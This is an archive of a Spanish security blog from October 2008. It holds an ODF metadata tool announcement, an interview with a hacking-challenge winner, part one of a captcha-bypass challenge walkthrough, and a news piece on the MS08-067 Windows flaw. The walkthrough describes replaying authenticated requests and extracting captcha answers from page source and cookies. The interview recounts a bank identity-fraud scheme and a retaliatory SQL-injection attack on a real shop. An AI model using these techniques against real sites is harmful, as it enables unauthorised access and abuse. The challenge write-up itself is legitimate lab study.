viernes, octubre 31, 2008

OOMetaExtractor

Para la conferencia de OpenSource World Conference de 2008 enviamos un trabajo sobre la limpieza de metadatos e información oculta en documentos ODF, para ello trabajamos en una herramienta que se llama OOMetaExtractor y en la que seguimos trabajando. Esta herramienta está disponible para todo el mundo en http://www.codeplex.com/OOMetaExtractor. Está desarrollada en .NET y todo el código está disponible para su descaraga.

La herramienta soporta los ficheros de las versiones OpenOffice 2.x, 3.x (*.odt *.ods *.odg *.odp) y OpenOffice 1.x (*.sxw).

La herramienta está pensada para extraer/eliminar o sustituir la siguiente información:

- Aplicación generadora del documento
- Sistema operativo
- Usuarios (Creador del documento, modificador, impreso por)
- Fechas de creación, modificación, impresión
- Título, asunto, descripción, palabras clave, estadísticas
- Número de ediciones, tiempo de edición
- Información definida por el usuario
- Rutas de plantillas
- Impresoras, bases de datos
- Emails, enlaces
- Versiones guardadas


Metadatos extraidos de documentos

La ventaja de la herramienta es que puede hacer esto a toda una carpeta, es decir, puede extraer los metadatos e información oculta de todos los documentos de una carpeta.


Generación de resumen

La herramienta creará un fichero de texto con toda la información resumida:


Resumen de metadatos de todos los documentos de una carpeta

Puede borrar todos los metadatos de una carpeta o un archivo.


Borrado/sustitución de metadatos

Y sustituir la información de todos los metadatos de todos los ficheros de una carpeta con valores predefinidos.


Valores a sustituir en todos los documentos

Así que si generas documentos ODF ya puedes limpiarlos "correctamente" antes de publicarlos. ;)

Saludos Malignos!

Aunque me cueste un riñón

Fue una batalla a muerte, pero íbamos preparados. Un grupo de asaltantes quisieron acabar con mi participación en las próximas conferencias de seguridad y decidieron emboscarnos. La noche en A Coruña los mantenía protegidos de miradas sospechosas y nosotros, felices y despreocupados salíamos de cenar como reyes del restaurante La Mamma cerca del campo de batalla del Superdepor.

Allí, el grupo de avanzadilla estaba compuesto por David “babyeyes” Barroso, Luciano Bello, Alfonso “steganopaulus”, Diego, Ivan Gonzalez, Miguel Gasteiro, Alejandra ex informática y Alejandra “showmethemoney” y juntos encaramos el regreso en las lanzaderas blancas hacia la taberna de Mos Eisley a tomar las últimas copas de Grog, cuando nos vimos asaltados.

Parece ser que el comando había estado en la sesión de la mañana dónde yo, a pesar de perder el avión y llegar on time con el siguiente, había seguido insistiendo en las burdas mentiras de Windows Vista. Ese grupo no estaba dispuesto a dejar que los mensajes siguieran siendo difundidos y estaban dispuestos a terminar con la propaganda de raíz.

Así, armados hasta los dientes, se abalanzaron sobre nosotros, Ivan, rápidamente apartó al grupo menos experimentado en el cuerpo a cuerpo detrás de él, al tiempo que los situaba en la lanzadera uno. “¡rápido, a la nave!” gritaba mientras disparaba fuego de cobertura a los cuernos de los enemigos.

Yo recibí un golpe en la cabeza y Luciano y Alfonso me recogieron antes de que cayera al suelo al tiempo que David “babyeyes” con una patada voladora tumbaba al más cercano de los enemigos. Babyeyes no es aficionado a las armas de fuego, pero sus enseñanzas con el maestro tortuga han hecho que sea capaz de hipnotizar al enemigo con la mirada al tiempo que reparte mortíferos ayukens.

Antes de que los siguientes dos atacantes pudieran alcanzar a Alfonso, Luciano y mi cuerpo inerte y medio inconsciente, yo pude ver entre tinieblas como David les rebanaba la cabeza con sendos “fatáties”.

Cuando nosotros tres alcanzábamos la lanzadera David decidió dejar al último gamorrano en la lejanía y acompañarnos para poder despegar y ponernos en velocidad lumínica lo antes posible, pero el gamorrano no iba a dejar que escapáramos tan fácilmente.

Sacó una cerbatana envenenada y aprovecho para clavarme un dardo envenenado en el riñón izquierdo…. De repente… todo se desvaneció ante mí con un fuerte e intenso dolor…..

Las siguientes imágenes las recuerdo como una sucesión de fotografías y sonidos lejanos…. Llegar a la unidad de cuidados, ser desnudado y pinchado en ambos brazos. “tómate esta pastilla”… “RÁpido, está anémico, tiene 10 de tensión y 35 de temperatura, esta tiritando”….

“Atadle a la camilla”….”No te muevas Maligno, la resistencia te necesita, pero tenemos que hacerte un Tac, puedes tener un derrame interno en el riñón…”

Bip, bip..

“Notarás un sabor extraño en la boca, ganas de mear y calor en el cuerpo… es por el contraste que te vamos a inyectar para hacerte la tomografía…”

Bip, bip…

Me mareo, tirito, el dolor es más intenso, no puedo seguir consciente….

Bip, bip…

Una hora más tarde me despierto… Estoy en la UCI…. El tac dice que el riñón está entero… ha habido suerte. Miro mis brazos, tengo un goteo una vía cerrada… Me están drogando para mitigar el dolor…. Me duermo….Todo hace fade to black….

A la mañana siguiente soy yo…. Me acompañan al baño para ver si echo sangre…, pero no, estoy bien. El dolor es intenso, pero nada que unos buenos calmantes no puedan cuidar…Pido el alta.

“No,no,no,no. Tienes que estar en observación un día más”

“Mire usted, he venido a esta ciudad a dar un mensaje, la rebelión me espera y no pienso darles el gustazo a esos gamorranos de conseguir que falte a mi cita. O me das el alta o me voy sin ella”.

Al final el doctor entró en razón y pude tomar un taxi que me llevo a la universidad. Allí, todo el equipo, sano y salvo me esperaba para acompañarme al escenario. Se encendieron las luces, se activó el micrófono y ya no sentía el dolor….

Mañana, en una nueva reunión ilegal, volveré a participar. Con el riñón destrozado, drogado (por causas médicas)… pero allí estaré, aunque me tengan que extirpar el riñón…

Que clippy te acompañe…

Saludos Malignos!

miércoles, octubre 29, 2008

Entrevista a Dani "The Doctor" Kachakil

Inteligente, trabajador, curioso, constante, preocupado... Dani "The Doctor" Kachakil es de esas personas que auna muchas de las características más deseadas en una única persona. Su nivel de conociento es equiparable al de su constancia. Detallista en su trabajo, afable y cercano... Es un pedazo de ingeniero... joder, es una puta "oveja blanca", coño. De esas que te dejan mal en la comparación.... Pero las cosas como son, hay que quitarse el sombrero con él!!


The Doctor

1.- Vale... ¿Cuántos años llevas en esto de la seguridad informática?

Menos de tres años. Si te vale como fecha orientativa, recuerdo que a mediados de 2005 descubrí que existía algo llamado "inyección SQL", pero solo a nivel de programador (tener cuidado con las comillas y poco más). A finales de 2006 me enteré de que el MD5 era "reversible", gracias a tu primer reto de hacking, así que imagínate si ha llovido desde entonces…

Profesionalmente nunca me he dedicado al tema de la seguridad (al menos por ahora, que nunca se sabe lo que deparará el futuro), por lo que no deja de ser una más de tantas inquietudes y aficiones que tengo y por ello solo le dedico parte de mi tiempo libre.


2.- Esto... ¿Kachakil es un nick chulo como el de Maligno?

Sí, tan chulo que hasta lo tengo impreso en mi DNI debajo de la etiqueta de "primer apellido". ¿Para qué calentarse la cabeza buscando otro nick?

3.- ¿Cómo un hacker como tú puede dejarse mangar pasta de la cuenta bancaria?

Para qué te cuento yo estas cosas… Pues sí, tiene su explicación y supongo que le puede pasar a cualquiera. Y no, no hablo del típico phising ni de fraudes online, que es lo primero que me pregunta todo el mundo cuando se lo cuento. Me refiero al que suele ser el eslabón más débil de la cadena: la estupidez humana. Ahí va el procedimiento:

Llega un tío a una sucursal de un banco y dice que quiere ingresar 5 euros en la cuenta de fulanito. El empleado del banco busca a fulanito en su base de datos y le dice que tiene N cuentas bancarias, preguntándole en cual de ellas quiere hacer el ingreso. Tras elegir cualquiera de ellas, el delincuente ingresa los 5 miserables euros y obtiene un resguardo de la operación en la que aparece el número de cuenta completo. Después de falsificar cualquier tipo de documento (en mi caso parece ser que fue un pasaporte de Guinea Ecuatorial), se planta en otra sucursal de cualquier ciudad suplantando la identidad de fulanito y dice que quiere sacar un extracto de su cuenta y a partir de ahí empieza a recorrer más sucursales pidiendo reintegros en efectivo de cantidades inferiores a 3000 euros (para evitar comprobaciones en la oficina principal). Si el empleado del banco sospecha, el tío no tiene más que salir por la puerta tan tranquilo y buscarse otra sucursal (a lo mejor le toca currarse otro documento falsificado, pero parece que eso les cuesta poco). Si esto se hace en pleno agosto, en oficinas pequeñas y en hora punta, mejor aún.


El procedimiento coló en tantas ocasiones que en un par de días se zumbaron mi cuenta casi al completo (sí, eso de tener tu propia empresa no implica que ganes tanta pasta). En fin, aceptaron un medio identificativo que no tiene ninguna validez en España, no comprobaron mi firma, ni cotejaron la foto con el escaneado de mi DNI y nadie se extrañó de nada. Afortunadamente estaban ahí las grabaciones y se vio que el delincuente en cuestión era de raza negra (vamos, que comprobaron claramente que no era yo intentando tomarle el pelo al banco). Al final me devolvieron todo el dinero, pero aún así no tiene ninguna gracia que accedieran así a mis datos.

4.- ¿Qué tomas para no tener que dormir? Porque tú no duermes, ¿verdad?

Nunca tomo nada ni para dormir ni para estar más tiempo despierto. Sí que duermo, aunque normalmente lo hago menos de lo que toca, por lo que en los días laborables se va acumulando el cansancio y, siempre que la ocasión lo permite, intento compensarlo el fin de semana levantándome bastante tarde. Siempre he preferido la noche al día, pero no bebo sangre fresca, ni muerdo cuellos ni nada por el estilo. ;-)

5.- ¿.NET o Java?

Pues depende de mil factores, porque la elección de una plataforma u otra no es cuestión de fe o de capricho. Es como preguntarse si es mejor hablar español o inglés, si conducir por la derecha o por la izquierda, si elegir una marca u otra de ropa, de coche o de cualquier otro producto…

Habiendo estudiado Java y otros lenguajes en la universidad, finalmente opté por .NET, pero no quiero que nadie tome esto como referencia o recomendación, porque yo tenía mis razones y no tienen por qué coincidir con las de otros. El que quiera dedicarse a esto, que se lo piense bien, que compare, pruebe, analice y extraiga sus propias conclusiones basadas en sus propias necesidades. Nunca os dejéis llevar por ninguna opinión o recomendación sin haberla cuestionado antes.

En ambas plataformas se puede hacer prácticamente lo mismo, pero esto evoluciona de una forma vertiginosa y para ser competitivo, en mi opinión, sale más rentable centrarse solamente en una de ellas (quien mucho abarca poco aprieta). Para estar al día hay que invertir muchísimo tiempo leyendo y probando, pero es algo muy agotador si quieres enterarte de todo lo que va saliendo (por ejemplo, WPF, WCF, LINQ, AJAX, Silverlight, etc.)


6.- ¿Se liga más siendo informático y hacker que sólo desarrollador?

"Informático" y "ligar" suelen ser términos incompatibles. Todo el mundo sabe que somos bichos raros y en el fondo creo que no les falta razón. A veces usamos tantas siglas y tecnicismos que parece que estemos hablando en otro idioma. Si le dices a una tía que tienes colgada una herramienta para hacer inyecciones a ciegas, lo más probable es que piense que eres un salido. Por cierto, si alguna está interesada en que le enseñe cómo se usa mi herramienta, que contacte conmigo, jeje. (Para malpensados) ;-)

7.- ¿Cómo te dio por meterte en esto de la seguridad informática?

¿No dicen que el conocimiento es poder? Siempre he sido una persona muy curiosa y me gusta saber un poco de todo, así que empecé a adquirir este tipo de conocimientos que me han sido de gran utilidad como analista, como desarrollador e incluso como simple usuario de informática. Cuanto más sabes de algo, más ángulo de visión tienes y por ello puedes ver las cosas de otra forma más completa. La clave está en que como desarrollador sabes cómo actuaría un atacante y como atacante sabes cómo suele actuar un desarrollador (o un técnico en redes y sistemas).

8.- ¿Qué sistema operativo usas "en la intimidad"?

¿En la intimidad? Pues te puedo contar que uso Symbian en mi móvil, Windows Mobile en mi PDA y supongo que un montón de sistemas operativos empotrados en un montón de dispositivos de uso diario. Si te refieres al que aparece cuando minimizo el Visual Studio, siguiendo la máxima de la informática "si funciona no lo toques", sigo usando Windows XP (no sea que me instale ese Vista Ultimate promocional que me regalaste y me deje colgado a los 365 días). Todo llegará… ;-)

9.- ¿Y Linux?

Supe de su existencia al entrar en la universidad, por lo que en su día me lo instalé con actitud bastante positiva porque además tuve que usarlo en muchísimas asignaturas, así que por entonces me defendía bastante bien con él y no tengo nada en su contra (lo digo porque conozco a mucho talibán anti-loquesea). Pero nunca he tenido razones suficientes como para dejar de usar Windows, ni tampoco para usar ambos a la vez y en ese sentido apliqué el mismo criterio que comentaba en la pregunta de Java o .NET, así que me quedé con uno de ellos y ya está, porque me hace la vida más fácil. Y lo dejo aquí porque no me gusta entrar en la clásica discusión que divide a tantos informáticos y que al final nunca llega a ningún sitio.

10.- ¿Qué has estudiado?

A nivel de títulos universitarios, principalmente ingeniería informática y un master en ingeniería de software, pero supongo que eso solo representa un porcentaje mínimo de los conocimientos que uno va adquiriendo en sus diversas áreas de interés (en mi caso, aprendo mucho de forma autodidacta). Por eso considero que un curriculum dice muy poco de las habilidades y conocimientos de una persona, pero a su vez es uno de los métodos más utilizados en la selección de personal de cualquier empresa, así que tampoco es cuestión de descuidarlo. Paradójico, pero es así…

11.- ¿Qué haces para ganarte la vida?

Pues antes de terminar la carrera creo que elegí el camino más duro y sacrificado para ganarse la vida, que es el de montarte tu propia una empresa desde cero y además sin haber tenido ninguna experiencia profesional previa. En su día empezamos cuatro socios y ahora quedamos dos, así que al ser una pequeña empresa de unas 7-10 personas (dependiendo de la época) me ha tocado hacer casi de todo, pero a lo que dedico más tiempo es al análisis y desarrollo de software.

12.- ¿Hay crisis en el sector informático?

La crisis te afecta en la medida en la que se ven afectados tus clientes y así sucesivamente hasta llegar al cliente final. Como el sector informático suele ofrecer servicios a otros sectores, unos se verán muy afectados por la crisis mientras que otros se verán incluso favorecidos, así que depende del trabajo concreto. Para muchos incluso puede ser positivo que tras este vendaval se reduzca la competencia con una base de negocio menos sólida.

Personalmente considero que precisamente ahora que se habla tanto de crisis y ahorro es cuando más hay que invertir en esas soluciones informáticas que te ayudan a optimizar los procesos de tu negocio y a controlar los pequeños hurtos por parte de algunos clientes o de tus propios empleados, pero no todo el mundo lo ve tan claro.


13.- ¿Cuánta gente te ayuda para pasar los retos?

Supongo que mucha gente lo hace sin saberlo, porque la documentación que hay disponible en Internet no estaría ahí de no ser por ellos. Por lo demás, los suelo sacar por mi cuenta, aunque cuando llegas a un punto de desesperación en el que has probado de todo y ya no sabes que hacer, es cuando te da por comentar cosas con otros participantes habituales como RoMaNSoFt, Mandingo o Bambú, pero si alguien se merece un reconocimiento especial en tus retos, ese es Alekusu, porque muchas fases no se podían haber superado sin su inestimable ayuda (levantando un servidor caído, parcheando fallos, etc.). ¿Pagas horas extra los fines de semana? ;-)

14.- ¿Cuál ha sido el reto hacking que más te ha gustado de los que has ganado?

Todos me han servido para aprender y poner en práctica varias técnicas, así que guardo un buen recuerdo de todos ellos y no sabría concretar cuál me ha gustado más. El primero fue muy especial, porque fue el que despertó mi curiosidad. A nivel estético sin duda el reto 5, al del mejor premio el badge del reto 9 para mí es como una reliquia (gracias a la donación de José Parada). También me han gustado muchas fases de otros retos, aunque no los haya ganado, como los de Warzone (increíble que mi nombre aún siga en el top 10, jeje), Yoire o BlindSec.

15.- ¿Hay tensión cuando compites con Palako, RoMaNSoFt, Bambú, etc...?

No hay más que ver las fechas de finalización de los primeros retos y compararlas con los últimos para darse cuenta de que cada vez hay más nivel y más competencia. Es como una carrera en la que no solo tienes que llegar al final, sino que tienes que hacerlo lo más rápido posible. Es normal que la adrenalina esté ahí presente para ponerte las pulsaciones a tope cuando te están pisando los talones, cuando se te adelantan, cuando pasas de fase o cuando descubres algo que te permite avanzar.

16.- ¿Y piques?

Supongo que también existe cierta "rivalidad", en el buen sentido de la palabra, porque en el fondo esto es un juego. A veces se gana y otras no (porque perder no perdemos nada), pero lo importante es divertirse y aprender. Solemos comentar detalles tras finalizar los retos y es algo muy enriquecedor. Unas veces hemos intercambiado ideas o técnicas muy interesantes y otras veces simplemente nos hemos partido de risa en más de una conversación.

17.- ¿A quién has conocido que te ha impresionado en tu vida?

Pues en el ámbito de la seguridad, gracias a esto de los retos y al primer AseguraIT he tenido el placer de poder conocer en persona a bastante gente de este mundillo. Y cuando no ha podido ser en persona, a veces ha sido en alguna conversación a través de Internet. En fin, hay mucha gente a la que admiro, a veces no tanto por sus conocimientos y habilidades como por otras cualidades personales, pero creo que para "conocer" a alguien se requiere muchísimo más tiempo.

18.- Gracias por no dedicarte a los buffers overflow que si no... ¿La web es lo que más te gusta romper?

Hombre, "romper" no creo que sea la palabra más adecuada, porque parece que me dedique a hacer travesuras o cosas con mala intención y eso tampoco es así. Como comentaba antes, me gusta saber un poco de todo y creo que mi hemisferio izquierdo ocupa el 80% de mi cerebro, así que se suele dar bien todo lo que tenga que ver con matemáticas, lógica, algorítmica, análisis, memoria, etc. De todas formas, me encantaría ampliar mis conocimientos de ingeniería inversa, porque es un tema que me apasiona y le veo mucha utilidad (no creo que tarde mucho en dedicarle algo de tiempo).

19.- ¿Has roto alguna vez alguna web a algún cabronazo que se lo mereciera?

Bueno, ante un juez lo negaré todo, jeje, pero hace varios años estábamos desarrollando nuestra primera plataforma web importante para un cliente que tenía previsto asociarse con un inversor. Como desconocía el sector, este inversor le pidió consejo a un amigo suyo que trabajaba como informático (en otro país algo lejano, por cierto) y éste nos metió un SQL injection de los clásicos. El inversor le pagó el viaje al informático para reunirse con nosotros y éste nos intentó dejar a la altura del betún con una serie de sandeces que no venían a cuento (que si el .NET no era estable, que si el Access era una base de datos de juguete, que si los campos tenían que estar en inglés, que si el Visual Studio no servía para maquetar en HTML, etc).

Estuvimos a punto de perder al inversor, al cliente y mucho dinero que habíamos invertido en el proyecto, pero finalmente logré convencer al inversor… Digamos que su amigo el informático cometió el error de darme su tarjeta de visita en la cual aparecía la URL de su empresa (una tienda online), que resultó estar basada en ASP clásico y SQL Server y tenía más agujeros que un colador. Como se suele decir, el que vive en una casa de cristal no debe arrojar piedras, así que en unos días aprendí lo suficiente como para devolverle la jugada con creces, puteándole durante varios días de mala manera, hasta el punto que nos llegaron varios faxes y cartas certificadas de su bufete de abogados, pidiéndonos más de 100.000 euros por daños y perjuicios. Finalmente nos disculpamos mutuamente y la cosa no llegó a más, pero al leer la carta se nos pusieron de corbata. Lo hice una vez, pero ni lo he vuelto hacer ni se me ocurriría volver a repetirlo. Por cierto, a día de hoy esa plataforma sigue funcionando y dando soporte a un montón de usuarios, así que a pesar de todo, parece que no lo hicimos tan mal.

20.- ¿Vas a dejarnos ganar algún reto a los demás?

Yo no pienso dejarme ganar, aunque intentes disuadirme con primeros premios como el del reto VIII o me hagáis jugarretas como el "safety car" del reto IX. Puede que algún reto salga en una fecha que me venga mal, o puede que me enganche en alguna fase y acabe en algún puesto de "luser" o incluso que no lo acabe, pero no pasa nada. Lo asumiré sin ningún problema siempre que el juego haya sido limpio.

martes, octubre 28, 2008

Solucionario Reto Hacking IX (I de II)
por Dani Kachakil

***************************************************************************************
Solucionario Reto Hacking IX (I de II) por Dani Kachakil
Solucionario Reto Hacking IX (II de II) por Dani Kachakil
***************************************************************************************
Introducción

Este documento describe una solución al Reto Hacking IX de Informática 64, el cuarto de la segunda temporada, que se publicó el 12 de septiembre de 2008 en la siguiente dirección web: http://retohacking9.elladodelmal.com

Pistas

De nuevo nos encontramos ante un reto en el que no hacen falta pistas, puesto que el objetivo estaba claro desde el principio. En todo caso, el título del post que anunciaba el reto (Hay que ser muy hombre o muy mujer) tenía mucha relación con el tema, en el sentido de que necesitaremos habilidades humanas para superar el reto, pero eso ve a posteriori y tampoco sirve de ayuda.

Visión general del reto

Tras darnos de alta y acceder con nuestro usuario registrado, nos encontramos ante el primer nivel de los 10 que forman el reto. Por el texto que aparece en cada nivel y por el propio título del reto podemos intuir que la cosa va de acertar captchas, nada menos que 1000 por cada nivel y en un plazo máximo de una hora que se empezaba a contar desde el primer acierto.

Con la habilidad suficiente tal vez no fuera imposible lograrlo a mano (con un promedio de 3,6 segundos por acierto), pero evidentemente se trataba de automatizar las peticiones, ya que hacerlo a mano resultaría un tanto aburrido y lento.

De todas formas, creo que en el planteamiento del reto no se tuvo en cuenta que prácticamente todos los niveles tenían una solución alternativa bastante más sencilla (o a lo mejor me equivoco), haciendo que el nivel 1 tuviera una solución idéntica a la del nivel 8. Por ello, explicaré la solución "oficial" por un lado y el atajo por otro (me imagino que éste último es el que utilizamos la mayoría de los participantes).

Nivel 1

Si le echamos un vistazo al código fuente de la página, veremos que el botón Enviar tiene asociada una pequeña función JavaScript llamada ValidateCaptcha, cuyo código aparece un poco más arriba. Simplificándola un poco, era similar a esta:

function ValidateCaptcha() {
if (document.getElementById('txtCaptcha').value == 'VSXVUTZQ') {
return true;
} else {
return false;
}
}


Bastaba con deshabilitar los scripts para que cada pulsación del botón Enviar contara como un acierto más. Además, la solución del captcha aparece en el propio código de la página como texto en claro, por lo que podríamos automatizar su lectura y su posterior envío a través del formulario.

Supongo que en este caso la solución "oficial" coincide con el atajo, es decir, capturar y reenviar 1000 veces la misma petición, manteniendo los valores asociados a los parámetros relevantes que se enviaban por post y la cookie de autenticación:

__VIEWSTATE = /wEPDwUKMTEwNjI0MjY0MQ9kFgJmD2QWAgIDD2QWAgIB ...
__EVENTVALIDATION = /wEWBAKt2PnGBQKsoYL1DwK15qaS ...
ctl00$ContentPlaceHolder1$btEnviar = Enviar

.ASPXAUTH = 4A4AD74485F839D53AC26F746FCBA03A14F63307CC4971 ...


Evidentemente, cada cual opta por las herramientas con las que se siente más cómodo, así que hay cientos de formas de automatizar esta tarea. En mi caso adapté parte del código que ya tenía hecho hace mucho tiempo y que incorporé en Marathon Tool (principalmente la función Download de BaseEngine.vb). Lo importante es que, transcurridos unos minutos dedicados a enviar las 1000 peticiones necesarias, pasamos automáticamente al siguiente nivel.

Nivel 2

Muy similar al nivel anterior, en esta ocasión nos encontramos con un campo oculto con la solución al captcha:

input name="ctl00$ContentPlaceHolder1$_valor" type="hidden"
id="ctl00_ContentPlaceHolder1__valor" value="VSXVUTZQ"


De nuevo, podíamos haber leído y reenviado el valor que se almacenaba en este campo, pero bastaba con repetir exactamente el mismo procedimiento del nivel 1, evitando el envío del parámetro ctl00$ContentPlaceHolder1$_valor (o en general, haciendo que coincida con el valor de ctl00$ContentPlaceHolder1$txtCaptcha)

Nivel 3

En esta ocasión, por ejemplo para el captcha "UWPCTNUU", nos encontramos con una cookie como la siguiente:

valor = 55575043544e5555

Es evidente que se trata de los valores ASCII de cada carácter del captcha, puestos en valor en hexadecimal y concatenados. Por ejemplo, en la secuencia anterior tenemos que 0x55 = "U", 0x57 = "W", 0x50 = "P", etc.

Podíamos optar por leer y convertir estos valores en sus correspondientes caracteres para decodificar el captcha de forma automatizada, pero de nuevo bastaba con repetir exactamente el mismo procedimiento del nivel 1, enviando además una cookie llamada valor con su contenido en blanco.

Nivel 4

Este nivel puede parecer incluso más fácil que el anterior, puesto que el nombre de la imagen corresponde con el valor del captcha mostrado:

img id="ctl00_ContentPlaceHolder1_ImgCapcha"
src="imagenes/DVNZVSHC.gif"


Sin embargo, se trata del primer nivel que realmente obliga a la lectura de este valor y a su posterior reenvío, por lo que tras realizar una petición inicial, procesaremos el contenido de la página para extraer el captcha (por ejemplo, buscando la posición de la primera aparición de la cadena ".gif" y recuperando los 8 caracteres anteriores). En la petición siguiente lo enviamos por POST en ctl00$ContentPlaceHolder1$txtCaptcha, leyendo de paso el nuevo captcha generado y así sucesivamente hasta llegar a completar las 1000 peticiones (sin olvidarnos de la cookie ASP.NET_SessionId).

Nivel 5

En este nivel observamos que hay un parámetro en la URL llamado key. Su longitud coincide con la de los captchas que han ido apareciendo hasta el momento:

http://retohacking9.elladodelmal.com/Niveles/Nivel05/Default.aspx?key=ONOATHZK

Podemos molestarnos en intentar averiguar la relación entre esa clave y el correspondiente captcha generado, pero es totalmente innecesario, ya que de nuevo podemos reenviar 1000 veces cualquier petición válida y superaremos el nivel…

De todas formas, supongo que la solución oficial era la primera, así que la expongo aquí porque la relación es muy fácil de obtener. Por ejemplo:

Key = AAAAAAAA –> Captcha = OAPSUNMO
Key = BBBBBBBB –> Captcha = PBQTVONP
Key = CCCCCCCC –> Captcha = QCRUWPOQ


Es evidente que existe una relación lineal entre cada carácter, por lo que basta con desplazar el alfabeto las siguientes posiciones respectivamente (es decir, se trata de un clásico y simple cifrado de Vigenère):

14, 0, 15, 18, 20, 13, 12, 14

***************************************************************************************
Solucionario Reto Hacking IX (I de II) por Dani Kachakil
Solucionario Reto Hacking IX (II de II) por Dani Kachakil
***************************************************************************************

lunes, octubre 27, 2008

Remakes

No hay nada peor que cuando se hace un remake de una película en la que lo único que se consigue es destrozarla... ¡para eso no la hagas esquimal! Es cierto que siempre habrá amantes/detractores de la nueva película, pero lo que está claro es que si se hace un remake es para aportar algo nuevo. Así, remakes como "El Planeta de los Simios" o "King Kong" aportan modernidad a historias clásicas, pero supongo que todos tenéis en la cabeza algunos remakes más malos que la madre que parió al topo.

En el caso de las noticias y los blogs, se produce el efecto del "teléfono escacharrado" uno lee en diagonal, interpreta y saca su noticia. Este proceso debe ser acompañado de la introducción de nuevas faltas de ortografía, la sustitución de protagonista y el aderezamiento de términos del estilo “cómo ya anticipamos aquí…”, o “cómo bien dije…”, etc…

En el caso del último parche de Spectra me había apuntado la obligación de comentarlo, cuando me llegó la solución para no currar caída en el inbox, … así que, cómo yo no lo voy a escribir mejor ni tan bien, y seguramente voy a cometer más faltas de ortografía, he decidió sustituir el nombre público de la compañía por el auténtico y dejar plasmada la información aquí tal como salió de sus deditos. Tuve que entregar el objeto secuestrado en cuestión, pero he conseguido que por fin, pajarraco siga la línea editorial de El Lado del mal.

Por cierto… ¿mañana hace diez años de algo, no?

Saludos Malignos!

Último parche de Spectra: ¿Sufriremos otro Blaster?... No.
Una la día: 24/10/2008

El día 23 Spectra publicó un parche fuera de su ciclo habitual, de carácter crítico, en el que se solucionaba un problema de seguridad en el servicio Server de las distintas versiones del sistema operativo Windows. Avisó con un día de antelación. Hoy, el exploit ya es público. Las características de la vulnerabilidad hacen que sea "ideal" para ser aprovechado por un gusano tipo Blaster, que se convirtió en epidemia en 2003. ¿Podría pasar lo mismo con este fallo?

En julio de 2003 se descubre el desbordamiento de memoria intermedia en la interfaz RPC de sistemas Windows que, a la postre, permitiría la aparición del fatídico gusano Blaster. Otro fallo parecido un año después propició el nacimiento de Sasser, otro popular gusano. El último parche publicado por Spectra de forma urgente, el MS08-067, tiene las mismas características: un desbordamiento de memoria intermedia en el procesamiento de peticiones RPC (Remote Procedure Call) que efectúa el servicio Server. ¿Se creará otro gusano parecido?

Lo que hace que esta vulnerabilidad sea especialmente peligrosa, es que es explotable de forma remota sin interacción del usuario: un atacante envía una petición especialmente manipulada a un puerto, y ya puede ejecutar código en el sistema con los máximos privilegios. Candidato ideal para un gusano "como los de antes". De ahí que Spectra, con buen criterio, se haya lanzado a romper su ciclo habitual. Quizás motivado porque el fallo ha sido descubierto cuando ya se estaban produciendo ataques muy concretos. No a gran escala, pero sí que se han detectado incidentes que demostraban que los atacantes conocían el problema y lo estaban aprovechando en secreto. La última vez que Spectra publicó una actualización de seguridad fuera de su ciclo habitual de actualizaciones fue el 3 de abril de 2007.

El último problema de este tipo (explotable enviado peticiones a un servicio) se vio hace más de dos años. Lo trataba el boletín MS06-040 y también afectaba al servicio Server (de hecho este nuevo boletín lo reemplaza). Se hizo público el exploit y hubo malware que lo aprovechaba, pero no fue epidemia. En este caso pensamos que tampoco se convertirá en el problema que antaño suponían estas vulnerabilidades. Por varias razones.

¿Por qué creemos que el potencial gusano no se convertirá en epidemia?

Spectra cometió enormes y numerosos fallos de seguridad de este tipo en el pasado. Los gusanos de infección masiva campaban a sus anchas. Pero intentó solucionarlo a través de varios métodos. Primero con su nueva estrategia de seguridad anunciada hacia 2002. Desde entonces (tarde quizás) la seguridad sería prioridad. El problema es que, sobre una base tan débil, los resultados han tardado en observarse... pero están ahí. Por ejemplo, sobre Vista y Windows 2008 esta última vulnerabilidad no es crítica sino sólo "importante", que no es poco. En las últimas versiones de Windows el atacante debe estar autenticado para poder hacer que el exploit ejecute código. Si no, sólo se provocará una denegación de servicio.

Con el Service Pack 2 de Windows XP se activa el cortafuegos entrante por defecto. Esto mitiga enormemente las posibilidades de explotación de este tipo de fallos. De hecho, desde que el Sevice Pack fue lanzado en agosto de 2004, el malware se trasladó al navegador. Al no poder aprovechar fallos en los servicios por culpa del cortafuegos, necesitaban colarse en los sistemas de otra forma, e Internet Explorer sufrió la consecuencias. Todavía hoy es la forma favorita del malware de ejecutar código. Por si fuera poco, hoy en día, los usuarios están más que nunca detrás de un router casero que protege, en principio, los puertos del ordenador.

También, con XP, Spectra introdujo una considerable mejora: muchos de los servicios por fin no se ejecutaban bajo el contexto del usuario más poderoso, SYSTEM. En Windows 2000, por el contrario, todos los servicios corrían con los máximos privilegios. Aunque para el caso esta medida no sirve. Svhost.exe y services.exe corren en XP y 2000 bajo los permisos de SYSTEM. Por otro lado, a partir de Vista el ASLR (Address Space Layout Randomization) impediría en buena medida también la ejecución de código.

Otro aspecto que mitiga el potencial problema es que Spectra ha liberado el parche antes de que se haga público el exploit. En 2003 con Blaster ocurrió también. El parche estaba disponible un mes antes de que apareciera el gusano. Pero los usuarios tenían otra cultura. Hoy en día, aunque no demasiado, la educación sobre seguridad es mayor. Las actualizaciones automáticas también ayudan bastante.

El fallo puede ser más grave en empresas. Si un sistema se infecta con un gusano que aproveche esta última vulnerabilidad, es muy probable que pueda acceder a los puertos de otros ordenadores de la misma red sin que se vea bloqueado por cortafuegos. Sobre todo si la red no está convenientemente segmentada. Los administradores de grandes redes corporativas deben estar especialmente atentos a este boletín y parchear lo antes posible. También los que compartan recursos del sistema en una red interna o hacia el exterior.

Aunque parece que se han observado reportes de que el fallo se está aprovechando desde hace tres semanas, la actuación de Spectra ha sido rápida. Detectar y analizar el problema lleva tiempo. Muchos analistas prestigiosos se han aventurado en el pasado a calificar de nuevos fallos problemas ya conocidos que ,simplemente, estaban siendo aprovechados a través de otro vector de ataque. Además hay que añadir el tiempo de comprobación del parche. Es un proceso que Spectra se toma con cuidado y tres semanas no es un tiempo descabellado. Esperemos en todo caso que la actualización corrija por completo la vulnerabilidad y que no se detecten problemas de estabilidad.

Por último, las casas antivirus están trabajando incansablemente para detectar potenciales exploits y el malware que lo acompaña. Estos fallos alcanzan gran repercusión y no pueden permitirse el lujo de no crear firmas específicas para bloquearlos. Aunque el volumen de malware a tratar sea infinitamente mayor, el número de actualizaciones de firmas es mayor que en 2003. En ese año, actualizar cada varios días era normal, mientras hoy casi todos los antivirus actualizan las firmas varias veces al día.

